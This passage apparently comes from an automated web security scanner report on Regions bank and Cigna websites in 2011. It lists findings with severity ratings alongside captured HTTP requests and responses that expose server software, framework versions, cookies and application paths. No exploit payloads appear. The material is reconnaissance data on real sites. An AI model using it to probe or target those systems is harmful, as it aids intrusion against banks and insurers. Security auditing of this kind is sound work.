| HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Expires: 01 Nov 1990 01:00:01 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p Set-Cookie: TESTCOOKIES=Test;expires Set-Cookie: CFID=52158672;expires=Wed Set-Cookie: CFTOKEN=42630575;expires Set-Cookie: JSESSIONID=0430e8dac Set-Cookie: PLANID=;path=/ Set-Cookie: GROUPID=;path=/ Set-Cookie: IID=;path=/ Set-Cookie: WEBUSAGE=124614;path=/ Set-Cookie: USERINTERNAL=0;path=/ Set-Cookie: VIRTDIR=regions;path=/ Date: Mon, 16 May 2011 16:46:14 GMT Connection: close <script type="text/javascript" language="javascript"> var str="launch,Bisys var urlLocation = self.location.href ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://www.regions.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Cache-Control: private Date: Mon, 16 May 2011 15:42:00 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 27843 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://www.regions.com | 
| Path: | /personal_banking.rf | 
| GET /personal_banking.rf HTTP/1.1 Host: www.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTPS Cache-Control: private Date: Mon, 16 May 2011 15:19:42 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 27887 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... | 
| Severity: | Medium | 
| Confidence: | Firm | 
| Host: | https://wwwa.applyon | 
| Path: | /USCCapp/Ctl/entry | 
| GET /USCCapp/Ctl/entry Host: wwwa.applyonlinenow.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 302 Found Date: Mon, 16 May 2011 15:28:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 Location: https://wwwa.applyon Content-Length: 0 Set-Cookie: JSESSIONID=0000wkGjL Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/plain; charset=ISO-8859-1 Content-Language: en-US | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /ProviderTheme/themes | 
| GET /ProviderTheme/themes Host: cignaforhcp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 318 content-type: text/plain date: Mon, 16 May 2011 15:31:58 GMT last-modified: Mon, 20 Dec 2010 18:20:32 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_32910a44-289d ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /portal/images/arrowonly | 
| GET /portal/images/arrowonly Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK accept-ranges: bytes content-length: 63 content-type: image/gif date: Mon, 16 May 2011 15:35:50 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_fab19a1c-356c GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min | 
| GET /mycignatheme/js/min Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:30:36 GMT last-modified: Wed, 20 Apr 2011 17:47:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 Content-Length: 168592 function progressbar(limit, met, gwidth) { calpercentage = Math.round(met*100/limit) calwidth=Math.round remwidth=Math.round output='<div class="out ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min | 
| GET /mycignatheme/js/min Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:30:26 GMT last-modified: Wed, 20 Apr 2011 17:47:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_e87abf76-4b84 Content-Length: 168592 function progressbar(limit, met, gwidth) { calpercentage = Math.round(met*100/limit) calwidth=Math.round remwidth=Math.round output='<div class="out ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:15 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_e87abf76-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:05 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:16 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_d992271a-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: http://www.mycigna.com/ Cache-Control: max-age=0 Origin: http://www.mycigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:21 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:21 GMT Set-Cookie: TLTSID=698A01C87FD11 Set-Cookie: TLTUID=698A01C87FD11 Set-Cookie: PD_STATEFUL_ccb88d86-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/ Cache-Control: max-age=0 Origin: https://my.cigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:33 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:33 GMT Set-Cookie: PD_STATEFUL_eb751ba4-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secure.regio | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: secure.regionsmortgage Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 404 Not Found ntCoent-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:30:26 GMT Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq Set-Cookie: rfaft2c1=3drGKRGPiL8l Set-Cookie: rfaft2c1_.regionsmortgage X-Expires-Orig: None Cache-Control: max-age=3, must-revalidate, private Cache-Control: private Set-Cookie: NSC_tfdvsf.sfhjpotnp Content-Length: 1635 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | / | 
| GET / HTTP/1.1 Host: secureapps.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: secureapps.regions.com | 
| HTTP/1.1 403 Forbidden Set-Cookie: secureapps.regions.com Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:41:40 GMT <html><head><title>Error< <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /OAO/DESGetFiles.aspx | 
| GET /OAO/DESGetFiles.aspx Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Date: Mon, 16 May 2011 15:19:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public Expires: Thu, 16 Jun 2011 05:00:00 GMT Content-Type: text/css; charset=utf-8 Content-Length: 804 .VAMErrorText { } .VAMBlinkText { color: White; } .VAMFieldWithError { } .VAMValSummary { color: red; } .VAMValSummary:link {color: red; text-decoration: none;} .VAMValSum ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 404 Not Found Set-Cookie: secureapps.regions.com Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:46 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/DES/Appearance | 
| GET /oao/DES/Appearance Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 403 Forbidden Set-Cookie: secureapps.regions.com Content-Length: 1529 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:02 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/ErrorPage.aspx | 
| GET /oao/ErrorPage.aspx HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:21:02 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 9876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/FormHandler.js | 
| GET /oao/FormHandler.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 86459 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT Accept-Ranges: bytes ETag: "04cba3f88ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:56 GMT ...// JScript File var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/confirmation | 
| GET /oao/Images/confirmation Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2319 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:06 GMT GIF89a........t....nnn... m..g. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/funding.gif | 
| GET /oao/Images/funding.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 3849 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:18 GMT GIF89a.......DDD......... #..G.9......&.;./($...QB. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/gettings | 
| GET /oao/Images/gettings Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2300 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:07 GMT GIF89a................ppp ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/helpIcon.gif | 
| GET /oao/Images/helpIcon.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 326 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a......l."w.3.....w`..Y..] ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/loading7.gif | 
| GET /oao/Images/loading7.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2246 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89aQ....?............. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/yourinfo | 
| GET /oao/Images/yourinfo Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 4021 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:06 GMT GIF89a................... ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Scripts/jquery.js | 
| GET /oao/Scripts/jquery.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 29856 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* * jQuery 1.2.3 - New Wave Javascript * * Copyright (c) 2008 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * $Date: 20 ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Scripts/thickbox.js | 
| GET /oao/Scripts/thickbox.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 17069 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:55 GMT /* * Thickbox 3.1 - One Box To Rule Them All. * By Cody Lindley (http://www.codylindley * Copyright (c) 2007 cody lindley * Licensed under the MIT License: http://www.opensource.org ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app01.aspx | 
| GET /oao/app01.aspx?type Host: secureapps.regions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Date: Mon, 16 May 2011 15:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache, no-store Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 48498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/app02.aspx | 
